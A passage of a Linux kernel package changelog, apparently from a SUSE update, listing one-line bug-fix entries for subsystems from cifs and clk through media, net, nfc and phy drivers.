- cifs: dns resolution is needed only for primary channel (git-fixes).
- cifs: do not disable interface polling on failure (git-fixes).
- cifs: do not search for channel if server is terminating (git-fixes).
- cifs: fix a pending undercount of srv_count (git-fixes).
- cifs: fix lock ordering while disabling multichannel (git-fixes).
- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).
- cifs: fix use after free for iface while disabling secondary channels (git-fixes).
- cifs: handle servers that still advertise multichannel after disabling (git-fixes).
- cifs: handle when server starts supporting multichannel (git-fixes).
- cifs: handle when server stops supporting multichannel (git-fixes).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).
- cifs: make sure that channel scaling is done only once (git-fixes).
- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).
- cifs: reset connections for all channels when reconnect requested (git-fixes).
- cifs: reset iface weights when we cannot find a candidate (git-fixes).
- cifs: serialize other channels when query server interfaces is pending (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- clk: clk-apple-nco: Add "apple,t8103-nco" compatible (git-fixes).
- clk: mediatek: Fix error handling in runtime PM setup (git-fixes).
- clk: meson: g12a: Limit the HDMI PLL OD to /4 (git-fixes).
- clk: meson: gxbb: Limit the HDMI PLL OD to /4 on GXL/GXM SoCs (git-fixes).
- clk: qcom: camcc-sm6350: Fix PLL config of PLL2 (git-fixes).
- clk: qcom: camcc-sm6350: Specify Titan GDSC power domain as a parent to other (git-fixes).
- clk: qcom: dispcc-sdm845: Enable parents for pixel clocks (git-fixes).
- clk: qcom: gcc-msm8917: Remove ALWAYS_ON flag from cpp_gdsc (git-fixes).
- clk: qcom: gcc-msm8953: Remove ALWAYS_ON flag from cpp_gdsc (git-fixes).
- clk: qcom: gfx3d: add parent to parent request map (git-fixes).
- clk: qcom: rcg2: compute 2d using duty fraction directly (git-fixes).
- clk: renesas: cpg-mssr: Add missing 1ms delay into reset toggle callback (git-fixes).
- clk: renesas: r9a06g032: Fix memory leak in error path (git-fixes).
- clk: renesas: rzg2l: Fix intin variable size (git-fixes).
- clk: renesas: rzg2l: Select correct div round macro (git-fixes).
- clk: tegra: tegra124-emc: Fix potential memory leak in tegra124_clk_register_emc() (git-fixes).
- clk: tegra: tegra124-emc: fix device leak on set_rate() (git-fixes).
- clocksource: Print durations for sync check unconditionally (bsc#1241345).
- clocksource: Reduce watchdog readout delay limit to prevent false positives (bsc#1241345).
- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).
- comedi: c6xdigio: Fix invalid PNP driver unregistration (git-fixes).
- comedi: check device's attached status in compat ioctls (git-fixes).
- comedi: dmm32at: serialize use of paged registers (git-fixes).
- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).
- comedi: multiq3: sanitize config options in multiq3_attach() (git-fixes).
- comedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel() (git-fixes).
- cpufreq: intel_pstate: Check IDA only before MSR_IA32_PERF_CTL writes (git-fixes).
- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).
- crypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id (git-fixes).
- crypto: authenc - Correctly pass EINPROGRESS back up to the caller (git-fixes).
- crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (git-fixes).
- crypto: cavium - fix dma_free_coherent() size (git-fixes).
- crypto: ccp - Add an S4 restore flow (git-fixes).
- crypto: ccree - Correctly handle return of sg_nents_for_len (git-fixes).
- crypto: hisilicon/qm - restore original qos values (git-fixes).
- crypto: hisilicon/sec2 - support skcipher/aead fallback for hardware queue unavailable (git-fixes).
- crypto: iaa - Fix incorrect return value in save_iaa_wq() (git-fixes).
- crypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode (git-fixes).
- crypto: octeontx - Fix length check to avoid truncation in ucode_load_store (git-fixes).
- crypto: octeontx - fix dma_free_coherent() size (git-fixes).
- crypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly (git-fixes).
- crypto: qat - fix duplicate restarting msg during AER error (git-fixes).
- crypto: qat - fix parameter order used in ICP_QAT_FW_COMN_FLAGS_BUILD (git-fixes).
- crypto: qat - fix warning on adf_pfvf_pf_proto.c (git-fixes).
- crypto: rockchip - drop redundant crypto_skcipher_ivsize() calls (git-fixes).
- crypto: seqiv - Do not use req->iv after crypto_aead_encrypt (git-fixes).
- crypto: virtio - Add spinlock protection with virtqueue notification (git-fixes).
- crypto: virtio - Remove duplicated virtqueue_kick in virtio_crypto_skcipher_crypt_req (git-fixes).
- device property: Allow secondary lookup in fwnode_get_next_child_node() (git-fixes).
- dm-integrity: limit MAX_TAG_SIZE to 255 (git-fixes).
- dm-verity: fix unreliable memory allocation (git-fixes).
- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)
- dma: dma-axi-dmac: fix SW cyclic transfers (git-fixes).
- dmaengine: apple-admac: Add "apple,t8103-admac" compatible (git-fixes).
- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).
- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).
- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).
- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).
- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).
- dmaengine: mediatek: uart-apdma: Fix above 4G addressing TX/RX (git-fixes).
- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).
- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).
- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).
- dmaengine: sun6i: Choose appropriate burst length under maxburst (stable-fixes).
- dmaengine: tegra-adma: Fix use-after-free (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).
- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).
- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).
- dmaengine: xilinx_dma: Fix uninitialized addr_width when "xlnx,addrwidth" property is missing (git-fixes).
- docs: ABI: sysfs-devices-soc: Fix swapped sample values (git-fixes).
- docs: fix WARNING document not included in any toctree (stable-fixes).
- docs: w1: fix w1-netlink invalid URL (git-fixes).
- dpll: Prevent duplicate registrations (git-fixes).
- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).
- dpll: fix return value check for kmemdup (git-fixes).
- dpll: indent DPLL option type by a tab (git-fixes).
- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).
- drivers/usb/dwc3: fix PCI parent check (git-fixes).
- drivers: iio: mpu3050: use dev_err_probe for regulator request (git-fixes).
- drm/amd/display: Avoid updating surface with the same surface under MPO (stable-fixes).
- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).
- drm/amd/display: Check NULL before accessing (stable-fixes).
- drm/amd/display: Fix DP no audio issue (stable-fixes).
- drm/amd/display: Fix logical vs bitwise bug in get_embedded_panel_info_v2_1() (git-fixes).
- drm/amd/display: Increase DPCD read retries (stable-fixes).
- drm/amd/display: Move sleep into each retry for retrieve_link_cap() (stable-fixes).
- drm/amd/display: Use GFP_ATOMIC in dc_create_plane_state() (stable-fixes).
- drm/amd/display: Use same max plane scaling limits for all 64 bpp formats (git-fixes).
- drm/amd/display: fix wrong color value mapping on MCM shaper LUT (git-fixes).
- drm/amd/pm: Do not clear SI SMC table when setting power limit (git-fixes).
- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).
- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).
- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).
- drm/amd: Fix hang on amdgpu unload by using pci_dev_is_disconnected() (git-fixes).
- drm/amdgpu/gfx10: fix wptr reset in KGQ init (stable-fixes).
- drm/amdgpu/gfx11: fix wptr reset in KGQ init (stable-fixes).
- drm/amdgpu/soc21: fix xclk for APUs (stable-fixes).
- drm/amdgpu: Add HAINAN clock adjustment (stable-fixes).
- drm/amdgpu: Adjust usleep_range in fence wait (stable-fixes).
- drm/amdgpu: Fix memory leak in amdgpu_acpi_enumerate_xcc() (git-fixes).
- drm/amdgpu: Fix memory leak in amdgpu_ras_init() (git-fixes).
- drm/amdgpu: Forward VMID reservation errors (git-fixes).
- drm/amdgpu: Skip emit de meta data on gfx11 with rs64 enabled (stable-fixes).
- drm/amdgpu: add missing lock to amdgpu_ttm_access_memory_sdma (git-fixes).
- drm/amdgpu: add support for HDP IP version 6.1.1 (stable-fixes).
- drm/amdgpu: avoid a warning in timedout job handler (stable-fixes).
- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).
- drm/amdgpu: fix cyan_skillfish2 gpu info fw handling (git-fixes).
- drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify (git-fixes).
- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)
- drm/amdkfd: Fix GART PTE for non-4K pagesize in svm_migrate_gart_map() (stable-fixes).
- drm/amdkfd: Fix out-of-bounds write in kfd_event_page_set() (stable-fixes).
- drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 (git-fixes).
- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).
- drm/amdkfd: fix debug watchpoints for logical devices (stable-fixes).
- drm/atmel-hlcdc: do not reject the commit if the src rect has fractional parts (stable-fixes).
- drm/atmel-hlcdc: fix memory leak from the atomic_destroy_state callback (stable-fixes).
- drm/atmel-hlcdc: fix use-after-free of drm_crtc_commit after release (stable-fixes).
- drm/bridge: samsung-dsim: Fix memory leak in error path (git-fixes).
- drm/bridge: ti-sn65dsi86: Enable HPD polling if IRQ is not used (git-fixes).
- drm/buddy: Prevent BUG_ON by validating rounded allocation (git-fixes).
- drm/display/dp_mst: Add protection against 0 vcpi (stable-fixes).
- drm/gma500: Remove unused helper psb_fbdev_fb_setcolreg() (git-fixes).
- drm/i915/acpi: free _DSM package when no connectors (git-fixes).
- drm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer (git-fixes).
- drm/i915/wakeref: clean up INTEL_WAKEREF_PUT_* flag macros (stable-fixes).
- drm/imx/tve: fix probe device leak (git-fixes).
- drm/logicvc: Fix device node reference leak in logicvc_drm_config_parse() (git-fixes).
- drm/mediatek: Fix CCORR mtk_ctm_s31_32_to_s1_n function issue (git-fixes).
- drm/mediatek: Fix device node reference leak in mtk_dp_dt_parse() (git-fixes).
- drm/mgag200: Fix big-endian support (git-fixes).
- drm/mgag200: fix mgag200_bmc_stop_scanout() (git-fixes).
- drm/msm/a2xx: fix pixel shader start on A225 (git-fixes).
- drm/msm/a2xx: stop over-complaining about the legacy firmware (git-fixes).
- drm/msm/a6xx: Fix out of bound IO access in a6xx_get_gmu_registers (git-fixes).
- drm/msm/a6xx: Flush LRZ cache before PT switch (git-fixes).
- drm/msm/dpu: Add missing NULL pointer check for pingpong interface (git-fixes).
- drm/msm/dpu: Remove dead-code in dpu_encoder_helper_reset_mixers() (git-fixes).
- drm/msm/dpu: fix CMD panels on DPU 1.x - 3.x (git-fixes).
- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).
- drm/nouveau/dispnv50: Do not call drm_atomic_get_crtc_state() in prepare_fb (git-fixes).
- drm/nouveau: add missing DCB connector types (git-fixes).
- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).
- drm/nouveau: restrict the flush page to a 32-bit address (git-fixes).
- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).
- drm/panel: sony-td4353-jdi: Enable prepare_prev_first (git-fixes).
- drm/pl111: Fix error handling in pl111_amba_probe (git-fixes).
- drm/radeon: Add HAINAN clock adjustment (stable-fixes).
- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).
- drm/radeon: delete radeon_fence_process in is_signaled, no deadlock (stable-fixes).
- drm/tegra: dsi: fix device leak on probe (git-fixes).
- drm/tegra: hdmi: sor: Fix error: variable ‘j’ set but not used (stable-fixes).
- drm/tilcdc: request and mapp iomem with devres (stable-fixes).
- drm/ttm: Avoid NULL pointer deref for evicted BOs (git-fixes).
- drm/v3d: Set DMA segment size to avoid debug warnings (stable-fixes).
- drm/vgem-fence: Fix potential deadlock on release (git-fixes).
- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).
- drm/vmwgfx: Fix invalid kref_put callback in vmw_bo_dirty_release (git-fixes).
- drm/vmwgfx: Return the correct value in vmw_translate_ptr functions (git-fixes).
- drm/vmwgfx: Use kref in vmw_bo_dirty (stable-fixes).
- drm: Account property blob allocations to memcg (stable-fixes).
- drm: nouveau: Replace sprintf() with sysfs_emit() (git-fixes).
- drm: sti: fix device leaks at component probe (git-fixes).
- efi/libstub: Describe missing 'out' parameter in efi_load_initrd (git-fixes).
- efi/libstub: Fix page table access in 5-level to 4-level paging transition (git-fixes).
- efi: Fix reservation of unaccepted memory table (git-fixes).
- efivarfs: fix error propagation in efivar_entry_get() (git-fixes).
- exfat: add a check for invalid data size (git-fixes).
- exfat: using hweight instead of internal logic (git-fixes).
- ext4: fix iloc.bh leak in ext4_xattr_inode_update_ref (git-fixes).
- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).
- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).
- fbcon: check return value of con2fb_acquire_newinfo() (git-fixes).
- fbdev: au1200fb: Fix a memory leak in au1200fb_drv_probe() (git-fixes).
- fbdev: ffb: fix corrupted video output on Sun FFB1 (stable-fixes).
- fbdev: gbefb: fix to use physical address instead of dma address (stable-fixes).
- fbdev: of: display_timing: fix refcount leak in of_get_display_timings() (git-fixes).
- fbdev: pxafb: Fix multiple clamped values in pxafb_adjust_timing (git-fixes).
- fbdev: rivafb: fix divide error in nv3_arb() (git-fixes).
- fbdev: smscufx: properly copy ioctl memory to kernelspace (stable-fixes).
- fbdev: ssd1307fb: fix potential page leak in ssd1307fb_probe() (git-fixes).
- fbdev: tcx.c fix mem_map to correct smem_start offset (git-fixes).
- fbdev: vt8500lcdfb: fix missing dma_free_coherent() (git-fixes).
- firewire: nosy: Fix dma_free_coherent() size (git-fixes).
- firmware: imx: scu-irq: Init workqueue before request mbox channel (stable-fixes).
- firmware: imx: scu-irq: fix OF node leak in (git-fixes).
- firmware: stratix10-svc: Add mutex in stratix10 memory management (git-fixes).
- firmware: stratix10-svc: fix bug in saving controller data (git-fixes).
- firmware: stratix10-svc: fix make htmldocs warning for stratix10_svc (git-fixes).
- fix it87_wdt early reboot by reporting running timer (stable-fixes).
- fpga: dfl: use subsys_initcall to allow built-in drivers to be added (git-fixes).
- fpga: of-fpga-region: Fail if any bridge is missing (stable-fixes).
- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).
- genalloc.h: fix htmldocs warning (git-fixes).
- gpio: aspeed-sgpio: Change the macro to support deferred probe (stable-fixes).
- gpio: omap: do not register driver in probe() (git-fixes).
- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).
- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).
- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).
- gpio: pca953x: fix wrong error probe return value (git-fixes).
- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).
- gpio: pca953x: mask interrupts in irq shutdown (stable-fixes).
- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).
- gpio: rockchip: mark the GPIO controller as sleeping (git-fixes).
- gpio: sprd: Change sprd_gpio lock to raw_spin_lock (stable-fixes).
- gpu: host1x: Fix race in syncpt alloc/free (git-fixes).
- hwmon: (f71882fg) Add F81968 support (stable-fixes).
- hwmon: (ibmpex) fix use-after-free in high/low store (git-fixes).
- hwmon: (max16065) Use READ/WRITE_ONCE to avoid compiler optimization induced race (git-fixes).
- hwmon: (max16065) Use local variable to avoid TOCTOU (git-fixes).
- hwmon: (nct6775) Add ASUS Pro WS WRX90E-SAGE SE (stable-fixes).
- hwmon: (occ) Mark occ_init_attribute() as __printf (git-fixes).
- hwmon: (tmp401) fix overflow caused by default conversion rate value (git-fixes).
- hwmon: (w83791d) Convert macros to functions to avoid TOCTOU (git-fixes).
- hwmon: (w83l786ng) Convert macros to functions to avoid TOCTOU (git-fixes).
- hwmon: sy7636a: Fix regulator_enable resource leak on error path (git-fixes).
- i2c: amd-mp2: fix reference leak in MP2 PCI device (git-fixes).
- i2c: designware: Disable SMBus interrupts to prevent storms from mis-configured firmware (stable-fixes).
- i2c: i2c.h: fix a bad kernel-doc line (git-fixes).
- i3c: Move device name assignment after i3c_bus_init (git-fixes).
- i3c: dw: Initialize spinlock to avoid upsetting lockdep (git-fixes).
- i3c: fix refcount inconsistency in i3c_master_register (git-fixes).
- i3c: master: Inherit DMA masks and parameters from parent device (stable-fixes).
- i3c: master: svc: Initialize 'dev' to NULL in svc_i3c_master_ibi_isr() (stable-fixes).
- i3c: master: svc: Prevent incomplete IBI transaction (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- idr: fix idr_alloc() returning an ID out of range (git-fixes).
- iio: Use IRQF_NO_THREAD (stable-fixes).
- iio: accel: bmc150: Fix irq assumption regression (stable-fixes).
- iio: accel: fix ADXL355 startup race condition (git-fixes).
- iio: accel: iis328dq: fix gain values (git-fixes).
- iio: adc: ad7280a: fix ad7280_store_balance_timer() (git-fixes).
- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).
- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).
- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).
- iio: adc: ti_am335x_adc: Limit step_avg to valid range for gcc complains (stable-fixes).
- iio: core: Clean up device correctly on iio_device_alloc() failure (git-fixes).
- iio: core: add missing mutex_destroy in iio_dev_release() (git-fixes).
- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).
- iio: gyro: itg3200: Fix unchecked return value in read_raw (git-fixes).
- iio: imu: st_lsm6dsx: Fix measurement unit for odr struct member (git-fixes).
- iio: imu: st_lsm6dsx: fix array size for st_lsm6dsx_settings fields (git-fixes).
- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).
- iio: magnetometer: Remove IRQF_ONESHOT (stable-fixes).
- iio: sca3000: Fix a resource leak in sca3000_probe() (git-fixes).
- iio: st_lsm6dsx: Fixed calibrated timestamp calculation (git-fixes).
- iio:common:ssp_sensors: Fix an error handling path ssp_probe() (git-fixes).
- ima: Handle error code returned by ima_filter_rule_match() (git-fixes).
- intel_th: Fix error handling in intel_th_output_open (git-fixes).
- intel_th: fix device leak on output open() (git-fixes).
- iomap: account for unaligned end offsets when truncating read range (git-fixes).
- ipmi: Fix __scan_channels() failing to rescan channels (stable-fixes).
- ipmi: Fix handling of messages with provided receive message pointer (git-fixes).
- ipmi: Fix the race between __scan_channels() and deliver_response() (stable-fixes).
- ipmi: Rework user message limit handling (git-fixes).
- ipmi: ipmb: initialise event handler read bytes (git-fixes).
- irqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc() (git-fixes).
- kABI workaround for HCI_LE_ADV_0 addition (git-fixes).
- kconfig/mconf: Initialize the default locale at startup (stable-fixes).
- kconfig/nconf: Initialize the default locale at startup (stable-fixes).
- kernel-binary: Require libdw in Factory Libdw is required for gendwarfksyms
- kernel-binary: Support building gendwarfksyms on SLE/Leap 15
- landlock: Optimize file path walks and prepare for audit support (bsc#1255698).
- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).
- leds: leds-lp50xx: Allow LED 0 to be added to module bank (git-fixes).
- leds: leds-lp50xx: Enable chip before any communication (git-fixes).
- leds: leds-lp50xx: LP5009 supports 3 modules for a total of 9 LEDs (git-fixes).
- leds: netxbig: Fix GPIO descriptor leak in error paths (git-fixes).
- leds: qcom-lpg: Check the return value of regmap_bulk_write() (git-fixes).
- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).
- lib/vsprintf: Check pointer before dereferencing in time_and_date() (git-fixes).
- mISDN: annotate data-race around dev->work (git-fixes).
- mailbox: mailbox-test: Fix debugfs_create_dir error checking (git-fixes).
- media: TDA1997x: Remove redundant cancel_delayed_work in probe (git-fixes).
- media: adv7180: fix frame interval in progressive mode (stable-fixes).
- media: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status() (git-fixes).
- media: amphion: Add a frame flush mode for decoder (stable-fixes).
- media: amphion: Cancel message work before releasing the VPU core (git-fixes).
- media: amphion: Clear last_buffer_dequeued flag for DEC_CMD_START (stable-fixes).
- media: amphion: Make some vpu_v4l2 functions static (stable-fixes).
- media: amphion: Remove vpu_vb_is_codecconfig (git-fixes).
- media: atomisp: Prefix firmware paths with "intel/ipu/" (bsc#1252973).
- media: atomisp: Remove firmware_name module parameter (bsc#1252973).
- media: ccs: Accommodate C-PHY into the calculation (git-fixes).
- media: ccs: Avoid possible division by zero (git-fixes).
- media: cec: Fix debugfs leak on bus_register() failure (git-fixes).
- media: cx23885: Add missing unmap in snd_cx23885_hw_params() (git-fixes).
- media: cx25821: Add missing unmap in snd_cx25821_hw_params() (git-fixes).
- media: cx25821: Fix a resource leak in cx25821_dev_setup() (stable-fixes).
- media: cx88: Add missing unmap in snd_cx88_hw_params() (git-fixes).
- media: dvb-core: dmxdevfilter must always flush bufs (stable-fixes).
- media: dvb-core: fix wrong reinitialization of ringbuffer on reopen (git-fixes).
- media: dvb-net: fix OOB access in ULE extension header tables (git-fixes).
- media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg() (git-fixes).
- media: i2c/tw9903: Fix potential memory leak in tw9903_probe() (git-fixes).
- media: i2c/tw9906: Fix potential memory leak in tw9906_probe() (git-fixes).
- media: i2c: ADV7604: Remove redundant cancel_delayed_work in probe (git-fixes).
- media: i2c: adv7842: Remove redundant cancel_delayed_work in probe (git-fixes).
- media: i2c: ov5647: Correct minimum VBLANK value (git-fixes).
- media: i2c: ov5647: Correct pixel array offset (git-fixes).
- media: i2c: ov5647: Fix PIXEL_RATE value for VGA mode (git-fixes).
- media: i2c: ov5647: Initialize subdev before controls (git-fixes).
- media: i2c: ov5647: Sensor should report RAW color space (git-fixes).
- media: i2c: ov5647: use our own mutex for the ctrl lock (git-fixes).
- media: msp3400: Avoid possible out-of-bounds array accesses in msp3400c_thread() (git-fixes).
- media: mtk-mdp: Fix a reference leak bug in mtk_mdp_remove() (git-fixes).
- media: mtk-mdp: Fix error handling in probe function (git-fixes).
- media: omap3isp: isp_video_mbus_to_pix/pix_to_mbus fixes (stable-fixes).
- media: omap3isp: isppreview: always clamp in preview_try_format() (stable-fixes).
- media: omap3isp: set initial format (stable-fixes).
- media: pvrusb2: Fix incorrect variable used in trace message (git-fixes).
- media: pvrusb2: fix URB leak in pvr2_send_request_ex (stable-fixes).
- media: qcom: camss: vfe: Fix out-of-bounds access in vfe_isr_reg_update() (git-fixes).
- media: radio-keene: fix memory leak in error path (git-fixes).
- media: rc: st_rc: Fix reset control resource leak (git-fixes).
- media: renesas: rcar_drif: fix device node reference leak in rcar_drif_bond_enabled (git-fixes).
- media: rkisp1: Fix filter mode register configuration (stable-fixes).
- media: samsung: exynos4-is: fix potential ABBA deadlock on init (git-fixes).
- media: solo6x10: Check for out of bounds chip_id (stable-fixes).
- media: uvcvideo: Fix allocation for small frame sizes (git-fixes).
- media: v4l2-mem2mem: Fix outdated documentation (git-fixes).
- media: venus: vdec: fix error state assignment for zero bytesused (git-fixes).
- media: verisilicon: Fix CPU stalls on G2 bus error (git-fixes).
- media: verisilicon: Protect G2 HEVC decoder against invalid DPB index (git-fixes).
- media: verisilicon: Store chroma and motion vectors offset (stable-fixes).
- media: verisilicon: g2: Use common helpers to compute chroma and mv offsets (stable-fixes).
- media: videobuf2: Fix device reference leak in vb2_dc_alloc error path (git-fixes).
- media: vidtv: initialize local pointers upon transfer of memory ownership (git-fixes).
- media: vpif_capture: fix section mismatch (git-fixes).
- media: vpif_display: fix section mismatch (git-fixes).
- mei: me: add nova lake point S DID (stable-fixes).
- mei: me: add wildcat lake P DID (stable-fixes).
- mfd: altera-sysmgr: Fix device leak on sysmgr regmap lookup (git-fixes).
- mfd: arizona: Fix regulator resource leak on wm5102_clear_write_sequencer() failure (git-fixes).
- mfd: core: Add locking around 'mfd_of_node_list' (git-fixes).
- mfd: da9055: Fix missing regmap_del_irq_chip() in error path (git-fixes).
- mfd: max77620: Fix potential IRQ chip conflict when probing two devices (git-fixes).
- mfd: mt6358-irq: Fix missing irq_domain_remove() in error path (git-fixes).
- mfd: mt6397-irq: Fix missing irq_domain_remove() in error path (git-fixes).
- mfd: tps6105x: Fix kernel-doc warnings relating to the core struct and tps6105x_mode (git-fixes).
- mfd: wm8350-core: Use IRQF_ONESHOT (git-fixes).
- misc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read() (stable-fixes).
- misc: eeprom: Fix EWEN/EWDS/ERAL commands for 93xx56 and 93xx66 (stable-fixes).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- mmc: mmci: Fix device_node reference leak in of_get_dml_pipe_index() (git-fixes).
- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).
- mmc: rtsx_pci_sdmmc: increase power-on settling delay to 5ms (git-fixes).
- mmc: sdhci-esdhc-imx: add alternate ARCH_S32 dependency to Kconfig (git-fixes).
- mmc: sdhci-msm: Avoid early clock doubling during HS400 transition (stable-fixes).
- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).
- most: usb: fix double free on late probe failure (git-fixes).
- mt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add() (git-fixes).
- mtd: lpddr_cmds: fix signed shifts in lpddr_cmds (git-fixes).
- mtd: maps: pcmciamtd: fix potential memory leak in pcmciamtd_detach() (git-fixes).
- mtd: nand: relax ECC parameter validation check (git-fixes).
- mtd: parsers: Fix memory leak in mtd_parser_tplink_safeloader_parse() (git-fixes).
- mtd: parsers: ofpart: fix OF node refcount leak in parse_fixed_partitions() (git-fixes).
- mtd: rawnand: cadence: Fix return type of CDMA send-and-wait helper (git-fixes).
- mtd: rawnand: lpc32xx_slc: fix GPIO descriptor leak on probe error and remove (git-fixes).
- mtd: rawnand: pl353: Fix software ECC support (git-fixes).
- mtd: rawnand: renesas: Handle devm_pm_runtime_enable() errors (git-fixes).
- mtd: spinand: Fix kernel doc (git-fixes).
- myri10ge: avoid uninitialized variable use (stable-fixes).
- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: mdio: aspeed: add dummy read to avoid read-after-write issue (git-fixes).
- net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write (git-fixes).
- net: nfc: nci: Fix parameter validation for packet data (git-fixes).
- net: phy: adin1100: Fix software power-down ready condition (git-fixes).
- net: phy: mxl-gpy: fix bogus error on USXGMII and integrated PHY (git-fixes).
- net: phy: mxl-gpy: fix link properties on USXGMII and internal PHYs (git-fixes).
- net: rose: fix invalid array index in rose_kill_by_device() (git-fixes).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: catc: enable basic endpoint checking (git-fixes).
- net: usb: dm9601: remove broken SR9700 support (git-fixes).
- net: usb: kalmia: validate USB endpoints (git-fixes).
- net: usb: kaweth: remove TX queue manipulation in kaweth_set_rx_mode (git-fixes).
- net: usb: kaweth: validate USB endpoints (git-fixes).
- net: usb: lan78xx: scan all MDIO addresses on LAN7801 (git-fixes).
- net: usb: pegasus: enable basic endpoint checking (git-fixes).
- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).
- net: usb: r8152: fix transmit queue timeout (stable-fixes).
- net: usb: rtl8150: fix memory leak on usb_submit_urb() failure (git-fixes).
- net: usb: sr9700: fix incorrect command used to write single register (git-fixes).
- net: usb: sr9700: remove code to drive nonexistent multicast filter (stable-fixes).
- net: usb: sr9700: support devices with virtual driver CD (stable-fixes).
- net: wan/fsl_ucc_hdlc: Fix dma_free_coherent() in uhdlc_memclean() (git-fixes).
- net: wan: farsync: Fix use-after-free bugs caused by unfinished tasklets (git-fixes).
- net: wwan: iosm: Fix memory leak in ipc_mux_deinit() (git-fixes).
- net: wwan: t7xx: fix potential skb->frags overflow in RX path (git-fixes).
- nfc: hci: shdlc: Stop timers and work before freeing context (git-fixes).
- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).
- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).
- nfc: nxp-nci: remove interrupt trigger type (stable-fixes).
- nfc: pn533: Fix error code in pn533_acr122_poweron_rdr() (git-fixes).
- nfc: pn533: properly drop the usb interface reference on disconnect (git-fixes).
- ntb: ntb_hw_switchtec: Fix array-index-out-of-bounds access (stable-fixes).
- ntb: ntb_hw_switchtec: Fix shift-out-of-bounds for 0 mw lut (stable-fixes).
- nvme: Use non zero KATO for persistent discovery connections (git-fixes).
- of: fix reference count leak in of_alias_scan() (git-fixes).
- of: platform: Use default match table for /firmware (git-fixes).
- orangefs: fix xattr related buffer overflow.. (git-fixes).
- phy: broadcom: bcm63xx-usbh: fix section mismatches (git-fixes).
- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).
- phy: fsl-imx8mq-usb: disable bind/unbind platform driver feature (stable-fixes).
- phy: mvebu-cp110-utmi: fix dr_mode property read from dts (stable-fixes).
- phy: renesas: rcar-gen3-usb2: Fix an error handling path in rcar_gen3_phy_usb2_probe() (git-fixes).
